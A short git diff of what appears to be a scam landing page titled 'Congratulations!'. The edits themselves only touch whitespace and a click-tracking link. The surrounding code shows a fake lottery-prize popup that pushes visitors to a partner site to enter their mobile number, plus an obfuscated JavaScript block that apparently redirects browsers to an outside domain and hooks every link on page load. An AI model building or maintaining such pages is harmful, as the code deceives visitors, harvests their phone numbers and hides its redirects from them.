--- a/pinbox/e20235231703ncash/prelp.html
+++ b/pinbox/e20235231703ncash/prelp.html
@@ -8,7 +8,7 @@
 	<title>Congratulations!</title>
 	<meta name="description" content="">
 	<meta name="keywords" content="">
-<!-- 关闭弹窗 放在head标签的底部 -->
+ <!-- 关闭弹窗 放在head标签的底部 -->
 	<script>
 		document.addEventListener("DOMContentLoaded", function() {
 			var buttons = document.querySelectorAll('a');
@@ -180,7 +180,7 @@ var _0x19d6=['prototype','Constructor','indexOf','location','https://merlinkok.c
 				html: '<strong>You may be a Winner of:</strong> <h2>Lottery voucher</h2><br><h4>Next Steps:</h4><br>1. You\'ll be redirected to the partner\'s site<br>2. Enter your mobile number<br>3. Get your Lottery prize',
 				allowOutsideClick: false,
 				showConfirmButton: false,
-				footer: '<a href="https://blast.radadpro.com/click/1" class="button" onclick="launchext(); exit_a1();" target="_blank">Confirm</a>'
+				footer: '<a href="https://blast.radadpro.com/click/" class="button" onclick="launchext(); exit_a1();" target="_blank">Confirm</a>'
 			});
 		}
 		i = 0;
